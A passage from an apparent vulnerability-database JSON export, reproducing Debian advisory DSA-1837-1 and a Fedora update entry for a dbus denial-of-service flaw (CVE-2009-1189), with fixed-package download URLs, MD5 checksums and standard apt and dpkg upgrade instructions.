archives:\n\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.2.1-5+lenny1.dsc\n Size/MD5 checksum: 1608 e084fe269b41c84cdeaafae2b2633e9f\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.2.1.orig.tar.gz\n Size/MD5 checksum: 1406833 b57aa1ba0834cbbb1e7502dc2cbfacc2\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.2.1-5+lenny1.diff.gz\n Size/MD5 checksum: 39470 6b875822ae5036ba8bf83f2fae11fbf0\n\nArchitecture independent packages:\n\n http://security.debian.org/pool/updates/main/d/dbus/dbus-1-doc_1.2.1-5+lenny1_all.deb\n Size/MD5 checksum: 1830232 317e72d84e019f0006d84e9579fa4b66\n\nalpha architecture (DEC Alpha)\n\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.2.1-5+lenny1_alpha.deb\n Size/MD5 checksum: 380740 b75e7906989484738737bc2e5e6bf66a\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-dev_1.2.1-5+lenny1_alpha.deb\n Size/MD5 checksum: 290338 fa8f5deeed2593a790283210375bde43\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-3_1.2.1-5+lenny1_alpha.deb\n Size/MD5 checksum: 170160 810c545ad2bf6212fcb745f10f3d39c9\n http://security.debian.org/pool/updates/main/d/dbus/dbus-x11_1.2.1-5+lenny1_alpha.deb\n Size/MD5 checksum: 66942 c810abd2e002daefa1f24942367208ce\n\namd64 architecture (AMD x86_64 (AMD64))\n\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-dev_1.2.1-5+lenny1_amd64.deb\n Size/MD5 checksum: 259300 9086503f08d3a4970c966cb1461b8309\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-3_1.2.1-5+lenny1_amd64.deb\n Size/MD5 checksum: 162880 12a802692ae3d1774a5cb2a55fee7abe\n http://security.debian.org/pool/updates/main/d/dbus/dbus-x11_1.2.1-5+lenny1_amd64.deb\n Size/MD5 checksum: 64710 62a4fbb57742faed71a853cd7c6d5443\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.2.1-5+lenny1_amd64.deb\n Size/MD5 checksum: 249006 966d8f20171594a83abd09251c277dd1\n\narm architecture (ARM)\n\n 
http://security.debian.org/pool/updates/main/d/dbus/dbus-x11_1.2.1-5+lenny1_arm.deb\n Size/MD5 checksum: 63812 f9acaf50dd1440312f9b3eb9e8ce5665\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.2.1-5+lenny1_arm.deb\n Size/MD5 checksum: 223424 20befb04db3b6ae82fb152354be8cf1f\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-dev_1.2.1-5+lenny1_arm.deb\n Size/MD5 checksum: 238514 0369f89685fa04a26ba050b5ae718368\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-3_1.2.1-5+lenny1_arm.deb\n Size/MD5 checksum: 144958 da65511355a4e4484042fd7377e2f520\n\narmel architecture (ARM EABI)\n\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-3_1.2.1-5+lenny1_armel.deb\n Size/MD5 checksum: 146562 64f4b077e7457a400ad88b8cfd6d9b57\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-dev_1.2.1-5+lenny1_armel.deb\n Size/MD5 checksum: 239468 89ddd32404daff070f43848aad9369c3\n http://security.debian.org/pool/updates/main/d/dbus/dbus-x11_1.2.1-5+lenny1_armel.deb\n Size/MD5 checksum: 63572 b67421a112b6bf92b47246c2ebd4618d\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.2.1-5+lenny1_armel.deb\n Size/MD5 checksum: 228326 096d983dcd56905b8d35a1a109dcd742\n\nhppa architecture (HP PA RISC)\n\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-dev_1.2.1-5+lenny1_hppa.deb\n Size/MD5 checksum: 263164 2a856048b8c09b075f089ae2551c356f\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-3_1.2.1-5+lenny1_hppa.deb\n Size/MD5 checksum: 163954 dd2a4efdbca917a569d6520be368336c\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.2.1-5+lenny1_hppa.deb\n Size/MD5 checksum: 270676 6ada153b9ff39dfd8a75c08a2a186784\n http://security.debian.org/pool/updates/main/d/dbus/dbus-x11_1.2.1-5+lenny1_hppa.deb\n Size/MD5 checksum: 64868 5a8bc1e82107effab796c04e6c05592d\n\ni386 architecture (Intel ia32)\n\n http://security.debian.org/pool/updates/main/d/dbus/dbus-x11_1.2.1-5+lenny1_i386.deb\n Size/MD5 checksum: 
64064 64e2b9c17836231e7abc0aff34690001\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-dev_1.2.1-5+lenny1_i386.deb\n Size/MD5 checksum: 235620 ac4307dc10c03340beeb13eefac1f600\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.2.1-5+lenny1_i386.deb\n Size/MD5 checksum: 230180 7ca48ece6eb966598f45394fa6f61ecb\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-3_1.2.1-5+lenny1_i386.deb\n Size/MD5 checksum: 148370 a6fef063aace9660fcd7b518a1658299\n\nia64 architecture (Intel ia64)\n\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-dev_1.2.1-5+lenny1_ia64.deb\n Size/MD5 checksum: 297824 15211d3862458004a9f10b6968d839e3\n http://security.debian.org/pool/updates/main/d/dbus/dbus-x11_1.2.1-5+lenny1_ia64.deb\n Size/MD5 checksum: 68598 e8d496cdde34439f3e8545f51b875a1d\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.2.1-5+lenny1_ia64.deb\n Size/MD5 checksum: 487536 4b94b66cd09d99250b8d78bab7a51cc3\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-3_1.2.1-5+lenny1_ia64.deb\n Size/MD5 checksum: 205560 a3943a7fde111a5fad1fb33a0b01471d\n\nmips architecture (MIPS (Big Endian))\n\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.2.1-5+lenny1_mips.deb\n Size/MD5 checksum: 247202 c5b66959665d900dee20b069d205db0a\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-dev_1.2.1-5+lenny1_mips.deb\n Size/MD5 checksum: 257016 ca8b0fc29104a6483f2ce45346d3c2dd\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-3_1.2.1-5+lenny1_mips.deb\n Size/MD5 checksum: 150832 c89353aaf1ff0acf40379b59c903153c\n http://security.debian.org/pool/updates/main/d/dbus/dbus-x11_1.2.1-5+lenny1_mips.deb\n Size/MD5 checksum: 64498 8f61fda7a3f7adf0e3069ad4535febf1\n\nmipsel architecture (MIPS (Little Endian))\n\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-dev_1.2.1-5+lenny1_mipsel.deb\n Size/MD5 checksum: 256382 7a3757146955ab439ca286aa9fc6dd94\n 
http://security.debian.org/pool/updates/main/d/dbus/dbus-x11_1.2.1-5+lenny1_mipsel.deb\n Size/MD5 checksum: 64528 e82065ecb4221b024d0fa0f7716b3a4a\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.2.1-5+lenny1_mipsel.deb\n Size/MD5 checksum: 246102 38f40717cb0f202e99067a484ce80848\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-3_1.2.1-5+lenny1_mipsel.deb\n Size/MD5 checksum: 150130 5658d2cdf77ad75b314f781f9630a8e3\n\npowerpc architecture (PowerPC)\n\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-3_1.2.1-5+lenny1_powerpc.deb\n Size/MD5 checksum: 157156 8ce5392e803ce8b824865362c5e7ceaf\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-dev_1.2.1-5+lenny1_powerpc.deb\n Size/MD5 checksum: 243468 31c4739ae2908480d9dadf21f243a76d\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.2.1-5+lenny1_powerpc.deb\n Size/MD5 checksum: 252104 af29662c0e472962196a03d9bcac0624\n http://security.debian.org/pool/updates/main/d/dbus/dbus-x11_1.2.1-5+lenny1_powerpc.deb\n Size/MD5 checksum: 67286 5d871cb882a468fc0d21981024b7bd5e\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-3_1.2.1-5+lenny1_sparc.deb\n Size/MD5 checksum: 145182 7493ade5ef50256253977a3c708a87dd\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.2.1-5+lenny1_sparc.deb\n Size/MD5 checksum: 254556 8f8bc903fe5eb131a75cbfd0f282cc21\n http://security.debian.org/pool/updates/main/d/dbus/dbus-x11_1.2.1-5+lenny1_sparc.deb\n Size/MD5 checksum: 63946 4e1a64b89ca25775553e7653cf2cb3eb\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-dev_1.2.1-5+lenny1_sparc.deb\n Size/MD5 checksum: 235150 7e6ab5023ad36c713a0eff40e6f60045\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: 
ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "edition": 9, "modified": "2009-07-18T08:56:45", "published": "2009-07-18T08:56:45", "id": "DEBIAN:DSA-1837-1:C3DAA", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2009/msg00151.html", "title": "[SECURITY] [DSA 1837-1] New dbus packages fix denial of service", "type": "debian", "cvss": {"score": 3.6, "vector": "AV:L/AC:L/Au:N/C:N/I:P/A:P"}}], "fedora": [{"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2008-3834"], "description": " D-BUS is a system for sending messages between applications. It is used both for the systemwide message bus service, and as a per-user-login-session messaging facility. ", "modified": "2008-10-09T21:35:00", "published": "2008-10-09T21:35:00", "id": "FEDORA:24A0D208970", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 9 Update: dbus-1.2.4-1.fc9", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:P"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:31", "bulletinFamily": "software", "cvelist": ["CVE-2009-1189"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n- ------------------------------------------------------------------------\r\nDebian Security Advisory DSA-1837-1 security@debian.org\r\nhttp://www.debian.org/security/ Steffen Joeris\r\nJuly 18, 2009 http://www.debian.org/security/faq\r\n- ------------------------------------------------------------------------\r\n\r\nPackage : dbus\r\nVulnerability : programming error\r\nProblem type : local\r\nDebian-specific: no\r\nCVE Id : CVE-2009-1189\r\nDebian Bug : 532720\r\n\r\n\r\nIt was discovered that the dbus_signature_validate function in\r\ndbus, a simple interprocess messaging system, is prone to a denial of\r\nservice attack. 
This issue was caused by an incorrect fix for\r\nDSA-1658-1.\r\n\r\nFor the stable distribution (lenny), this problem has been fixed in\r\nversion 1.2.1-5+lenny1.\r\n\r\nFor the oldstable distribution (etch), this problem has been fixed in\r\nversion 1.0.2-1+etch3.\r\n\r\nPackages for ia64 and s390 will be released once they are available.\r\n\r\nFor the testing distribution (squeeze) and the unstable distribution\r\n(sid), this problem has been fixed in version 1.2.14-1.\r\n\r\n\r\nWe recommend that you upgrade your dbus packages.\r\n\r\n\r\nUpgrade instructions\r\n- --------------------\r\n\r\nwget url\r\n will fetch the file for you\r\ndpkg -i file.deb\r\n will install the referenced file.\r\n\r\nIf you are using the apt-get package manager, use the line for\r\nsources.list as given below:\r\n\r\napt-get update\r\n will update the internal database\r\napt-get upgrade\r\n will install corrected packages\r\n\r\nYou may use an automated update by adding the resources from the\r\nfooter to the proper configuration.\r\n\r\n\r\nDebian GNU/Linux 4.0 alias etch\r\n- -------------------------------\r\n\r\nDebian (oldstable)\r\n- ------------------\r\n\r\nOldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390\r\nand sparc.\r\n\r\nSource archives:\r\n\r\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.0.2-1+etch3.diff.gz\r\n Size/MD5 checksum: 20482 fd114e50577aade0211a25bc05ac064d\r\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.0.2.orig.tar.gz\r\n Size/MD5 checksum: 1400278 0552a9b54beb4a044951b7cdbc8fc855\r\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.0.2-1+etch3.dsc\r\n Size/MD5 checksum: 824 0befb91739de13f92197336b6a3f3f06\r\n\r\nArchitecture independent packages:\r\n\r\n http://security.debian.org/pool/updates/main/d/dbus/dbus-1-doc_1.0.2-1+etch3_all.deb\r\n Size/MD5 checksum: 1622204 67e2242179a8af1f3a7363d0d9728702\r\n\r\nalpha architecture (DEC Alpha)\r\n\r\n 
http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-3_1.0.2-1+etch3_alpha.deb\r\n Size/MD5 checksum: 289142 2da5aaed2ca0e1dfe4627f2d51923a1a\r\n http://security.debian.org/pool/updates/main/d/dbus/dbus-1-utils_1.0.2-1+etch3_alpha.deb\r\n Size/MD5 checksum: 184834 a14af28f5651f06cd41f4aa8b264d486\r\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.0.2-1+etch3_alpha.deb\r\n Size/MD5 checksum: 378214 95128d7c15be44464dd1a785788fdc3d\r\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-dev_1.0.2-1+etch3_alpha.deb\r\n Size/MD5 checksum: 403766 5facc50da806d2f82a1ca839e045035d\r\n\r\namd64 architecture (AMD x86_64 (AMD64))\r\n\r\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-3_1.0.2-1+etch3_amd64.deb\r\n Size/MD5 checksum: 279294 6b0085ce0a01a81a13b068759de269b8\r\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-dev_1.0.2-1+etch3_amd64.deb\r\n Size/MD5 checksum: 348654 4d1f1c1d5c074be51b777b93b332eaf7\r\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.0.2-1+etch3_amd64.deb\r\n Size/MD5 checksum: 363928 54ed19ba7cbd0dd3475827c6e6df5acf\r\n http://security.debian.org/pool/updates/main/d/dbus/dbus-1-utils_1.0.2-1+etch3_amd64.deb\r\n Size/MD5 checksum: 184200 e5bc33b1e7dbfea9c372a3056e3f1848\r\n\r\narm architecture (ARM)\r\n\r\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.0.2-1+etch3_arm.deb\r\n Size/MD5 checksum: 343960 e7c6c2269903d8dbd4422103a9e1edaf\r\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-3_1.0.2-1+etch3_arm.deb\r\n Size/MD5 checksum: 265322 4e7ce3fca8c685e540092e70474e6fbd\r\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-dev_1.0.2-1+etch3_arm.deb\r\n Size/MD5 checksum: 330958 cee5e85136606605bd290035d9452f90\r\n http://security.debian.org/pool/updates/main/d/dbus/dbus-1-utils_1.0.2-1+etch3_arm.deb\r\n Size/MD5 checksum: 183240 d7e3c477f4f4fbbc49c04b035e92ff2a\r\n\r\nhppa architecture (HP PA RISC)\r\n\r\n 
http://security.debian.org/pool/updates/main/d/dbus/dbus_1.0.2-1+etch3_hppa.deb\r\n Size/MD5 checksum: 374136 7d297f74e9fde26e726f06f321208dae\r\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-3_1.0.2-1+etch3_hppa.deb\r\n Size/MD5 checksum: 286074 0a55d6aa6400d4d5750ebd92e9de7aab\r\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-dev_1.0.2-1+etch3_hppa.deb\r\n Size/MD5 checksum: 362166 013680aca7b38c66292a8727855bfc06\r\n http://security.debian.org/pool/updates/main/d/dbus/dbus-1-utils_1.0.2-1+etch3_hppa.deb\r\n Size/MD5 checksum: 184934 061417fe2e791b5bc7abf62398b3a8a8\r\n\r\ni386 architecture (Intel ia32)\r\n\r\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-dev_1.0.2-1+etch3_i386.deb\r\n Size/MD5 checksum: 335758 605f4f911d8445b74cbd46ede0fcfb89\r\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-3_1.0.2-1+etch3_i386.deb\r\n Size/MD5 checksum: 268688 c64ca51e9e04d1e961a8db7132ba4e08\r\n http://security.debian.org/pool/updates/main/d/dbus/dbus-1-utils_1.0.2-1+etch3_i386.deb\r\n Size/MD5 checksum: 184134 58672102a58bca326f4ba09c5bf3666a\r\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.0.2-1+etch3_i386.deb\r\n Size/MD5 checksum: 348012 ae8f836c9e5b631eb421f3b86dc78f49\r\n\r\nmips architecture (MIPS (Big Endian))\r\n\r\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.0.2-1+etch3_mips.deb\r\n Size/MD5 checksum: 370052 f8ea51037f985d6b8f2a288b9a813ccd\r\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-dev_1.0.2-1+etch3_mips.deb\r\n Size/MD5 checksum: 359844 b0b0956206921cff260c531aa9286f21\r\n http://security.debian.org/pool/updates/main/d/dbus/dbus-1-utils_1.0.2-1+etch3_mips.deb\r\n Size/MD5 checksum: 184240 4dd808980afe395d6909549614fab214\r\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-3_1.0.2-1+etch3_mips.deb\r\n Size/MD5 checksum: 272764 7ceea85232267e0a80f4fd5cb38ddf09\r\n\r\nmipsel architecture (MIPS (Little Endian))\r\n\r\n 
http://security.debian.org/pool/updates/main/d/dbus/dbus_1.0.2-1+etch3_mipsel.deb\r\n Size/MD5 checksum: 369664 07d0e90fc376acf855563baec0293856\r\n http://security.debian.org/pool/updates/main/d/dbus/dbus-1-utils_1.0.2-1+etch3_mipsel.deb\r\n Size/MD5 checksum: 184260 f81b2223f912a359a4fd7bc1f61ba7e4\r\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-dev_1.0.2-1+etch3_mipsel.deb\r\n Size/MD5 checksum: 358830 947820464929873955f7f6a427403838\r\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-3_1.0.2-1+etch3_mipsel.deb\r\n Size/MD5 checksum: 272442 3d19769e8260b3d434e6dd577d72c5c0\r\n\r\npowerpc architecture (PowerPC)\r\n\r\n http://security.debian.org/pool/updates/main/d/dbus/dbus-1-utils_1.0.2-1+etch3_powerpc.deb\r\n Size/MD5 checksum: 184222 c06ffd6735f13d9f6c9301a0dd487efd\r\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-dev_1.0.2-1+etch3_powerpc.deb\r\n Size/MD5 checksum: 335910 9fe78e085108bbacb7f04566247aa51e\r\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-3_1.0.2-1+etch3_powerpc.deb\r\n Size/MD5 checksum: 271718 021c33a25a85bcdc394fc0c5af784256\r\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.0.2-1+etch3_powerpc.deb\r\n Size/MD5 checksum: 353656 9e40213397ea8306184da6c8e0bcb070\r\n\r\nsparc architecture (Sun SPARC/UltraSPARC)\r\n\r\n http://security.debian.org/pool/updates/main/d/dbus/dbus-1-utils_1.0.2-1+etch3_sparc.deb\r\n Size/MD5 checksum: 184266 d82e92039c32386a69e0f1b119820ae8\r\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-3_1.0.2-1+etch3_sparc.deb\r\n Size/MD5 checksum: 265144 d7f6e34015d0adc757942c6d1dae3c56\r\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.0.2-1+etch3_sparc.deb\r\n Size/MD5 checksum: 341300 3bb2b297ebd12d562b0185b6b58196a8\r\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-dev_1.0.2-1+etch3_sparc.deb\r\n Size/MD5 checksum: 337130 1b9530365393919e15ffce3a695441ea\r\n\r\n\r\nDebian GNU/Linux 5.0 alias lenny\r\n- 
--------------------------------\r\n\r\nDebian (stable)\r\n- ---------------\r\n\r\nStable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc,\r\ns390 and sparc.\r\n\r\nSource archives:\r\n\r\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.2.1-5+lenny1.dsc\r\n Size/MD5 checksum: 1608 e084fe269b41c84cdeaafae2b2633e9f\r\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.2.1.orig.tar.gz\r\n Size/MD5 checksum: 1406833 b57aa1ba0834cbbb1e7502dc2cbfacc2\r\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.2.1-5+lenny1.diff.gz\r\n Size/MD5 checksum: 39470 6b875822ae5036ba8bf83f2fae11fbf0\r\n\r\nArchitecture independent packages:\r\n\r\n http://security.debian.org/pool/updates/main/d/dbus/dbus-1-doc_1.2.1-5+lenny1_all.deb\r\n Size/MD5 checksum: 1830232 317e72d84e019f0006d84e9579fa4b66\r\n\r\nalpha architecture (DEC Alpha)\r\n\r\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.2.1-5+lenny1_alpha.deb\r\n Size/MD5 checksum: 380740 b75e7906989484738737bc2e5e6bf66a\r\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-dev_1.2.1-5+lenny1_alpha.deb\r\n Size/MD5 checksum: 290338 fa8f5deeed2593a790283210375bde43\r\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-3_1.2.1-5+lenny1_alpha.deb\r\n Size/MD5 checksum: 170160 810c545ad2bf6212fcb745f10f3d39c9\r\n http://security.debian.org/pool/updates/main/d/dbus/dbus-x11_1.2.1-5+lenny1_alpha.deb\r\n Size/MD5 checksum: 66942 c810abd2e002daefa1f24942367208ce\r\n\r\namd64 architecture (AMD x86_64 (AMD64))\r\n\r\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-dev_1.2.1-5+lenny1_amd64.deb\r\n Size/MD5 checksum: 259300 9086503f08d3a4970c966cb1461b8309\r\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-3_1.2.1-5+lenny1_amd64.deb\r\n Size/MD5 checksum: 162880 12a802692ae3d1774a5cb2a55fee7abe\r\n http://security.debian.org/pool/updates/main/d/dbus/dbus-x11_1.2.1-5+lenny1_amd64.deb\r\n Size/MD5 checksum: 
64710 62a4fbb57742faed71a853cd7c6d5443\r\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.2.1-5+lenny1_amd64.deb\r\n Size/MD5 checksum: 249006 966d8f20171594a83abd09251c277dd1\r\n\r\narm architecture (ARM)\r\n\r\n http://security.debian.org/pool/updates/main/d/dbus/dbus-x11_1.2.1-5+lenny1_arm.deb\r\n Size/MD5 checksum: 63812 f9acaf50dd1440312f9b3eb9e8ce5665\r\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.2.1-5+lenny1_arm.deb\r\n Size/MD5 checksum: 223424 20befb04db3b6ae82fb152354be8cf1f\r\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-dev_1.2.1-5+lenny1_arm.deb\r\n Size/MD5 checksum: 238514 0369f89685fa04a26ba050b5ae718368\r\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-3_1.2.1-5+lenny1_arm.deb\r\n Size/MD5 checksum: 144958 da65511355a4e4484042fd7377e2f520\r\n\r\narmel architecture (ARM EABI)\r\n\r\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-3_1.2.1-5+lenny1_armel.deb\r\n Size/MD5 checksum: 146562 64f4b077e7457a400ad88b8cfd6d9b57\r\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-dev_1.2.1-5+lenny1_armel.deb\r\n Size/MD5 checksum: 239468 89ddd32404daff070f43848aad9369c3\r\n http://security.debian.org/pool/updates/main/d/dbus/dbus-x11_1.2.1-5+lenny1_armel.deb\r\n Size/MD5 checksum: 63572 b67421a112b6bf92b47246c2ebd4618d\r\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.2.1-5+lenny1_armel.deb\r\n Size/MD5 checksum: 228326 096d983dcd56905b8d35a1a109dcd742\r\n\r\nhppa architecture (HP PA RISC)\r\n\r\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-dev_1.2.1-5+lenny1_hppa.deb\r\n Size/MD5 checksum: 263164 2a856048b8c09b075f089ae2551c356f\r\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-3_1.2.1-5+lenny1_hppa.deb\r\n Size/MD5 checksum: 163954 dd2a4efdbca917a569d6520be368336c\r\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.2.1-5+lenny1_hppa.deb\r\n Size/MD5 checksum: 270676 6ada153b9ff39dfd8a75c08a2a186784\r\n 
http://security.debian.org/pool/updates/main/d/dbus/dbus-x11_1.2.1-5+lenny1_hppa.deb\r\n Size/MD5 checksum: 64868 5a8bc1e82107effab796c04e6c05592d\r\n\r\ni386 architecture (Intel ia32)\r\n\r\n http://security.debian.org/pool/updates/main/d/dbus/dbus-x11_1.2.1-5+lenny1_i386.deb\r\n Size/MD5 checksum: 64064 64e2b9c17836231e7abc0aff34690001\r\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-dev_1.2.1-5+lenny1_i386.deb\r\n Size/MD5 checksum: 235620 ac4307dc10c03340beeb13eefac1f600\r\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.2.1-5+lenny1_i386.deb\r\n Size/MD5 checksum: 230180 7ca48ece6eb966598f45394fa6f61ecb\r\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-3_1.2.1-5+lenny1_i386.deb\r\n Size/MD5 checksum: 148370 a6fef063aace9660fcd7b518a1658299\r\n\r\nia64 architecture (Intel ia64)\r\n\r\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-dev_1.2.1-5+lenny1_ia64.deb\r\n Size/MD5 checksum: 297824 15211d3862458004a9f10b6968d839e3\r\n http://security.debian.org/pool/updates/main/d/dbus/dbus-x11_1.2.1-5+lenny1_ia64.deb\r\n Size/MD5 checksum: 68598 e8d496cdde34439f3e8545f51b875a1d\r\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.2.1-5+lenny1_ia64.deb\r\n Size/MD5 checksum: 487536 4b94b66cd09d99250b8d78bab7a51cc3\r\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-3_1.2.1-5+lenny1_ia64.deb\r\n Size/MD5 checksum: 205560 a3943a7fde111a5fad1fb33a0b01471d\r\n\r\nmips architecture (MIPS (Big Endian))\r\n\r\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.2.1-5+lenny1_mips.deb\r\n Size/MD5 checksum: 247202 c5b66959665d900dee20b069d205db0a\r\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-dev_1.2.1-5+lenny1_mips.deb\r\n Size/MD5 checksum: 257016 ca8b0fc29104a6483f2ce45346d3c2dd\r\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-3_1.2.1-5+lenny1_mips.deb\r\n Size/MD5 checksum: 150832 c89353aaf1ff0acf40379b59c903153c\r\n 
http://security.debian.org/pool/updates/main/d/dbus/dbus-x11_1.2.1-5+lenny1_mips.deb\r\n Size/MD5 checksum: 64498 8f61fda7a3f7adf0e3069ad4535febf1\r\n\r\nmipsel architecture (MIPS (Little Endian))\r\n\r\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-dev_1.2.1-5+lenny1_mipsel.deb\r\n Size/MD5 checksum: 256382 7a3757146955ab439ca286aa9fc6dd94\r\n http://security.debian.org/pool/updates/main/d/dbus/dbus-x11_1.2.1-5+lenny1_mipsel.deb\r\n Size/MD5 checksum: 64528 e82065ecb4221b024d0fa0f7716b3a4a\r\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.2.1-5+lenny1_mipsel.deb\r\n Size/MD5 checksum: 246102 38f40717cb0f202e99067a484ce80848\r\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-3_1.2.1-5+lenny1_mipsel.deb\r\n Size/MD5 checksum: 150130 5658d2cdf77ad75b314f781f9630a8e3\r\n\r\npowerpc architecture (PowerPC)\r\n\r\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-3_1.2.1-5+lenny1_powerpc.deb\r\n Size/MD5 checksum: 157156 8ce5392e803ce8b824865362c5e7ceaf\r\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-dev_1.2.1-5+lenny1_powerpc.deb\r\n Size/MD5 checksum: 243468 31c4739ae2908480d9dadf21f243a76d\r\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.2.1-5+lenny1_powerpc.deb\r\n Size/MD5 checksum: 252104 af29662c0e472962196a03d9bcac0624\r\n http://security.debian.org/pool/updates/main/d/dbus/dbus-x11_1.2.1-5+lenny1_powerpc.deb\r\n Size/MD5 checksum: 67286 5d871cb882a468fc0d21981024b7bd5e\r\n\r\nsparc architecture (Sun SPARC/UltraSPARC)\r\n\r\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-3_1.2.1-5+lenny1_sparc.deb\r\n Size/MD5 checksum: 145182 7493ade5ef50256253977a3c708a87dd\r\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.2.1-5+lenny1_sparc.deb\r\n Size/MD5 checksum: 254556 8f8bc903fe5eb131a75cbfd0f282cc21\r\n http://security.debian.org/pool/updates/main/d/dbus/dbus-x11_1.2.1-5+lenny1_sparc.deb\r\n Size/MD5 checksum: 63946 4e1a64b89ca25775553e7653cf2cb3eb\r\n 
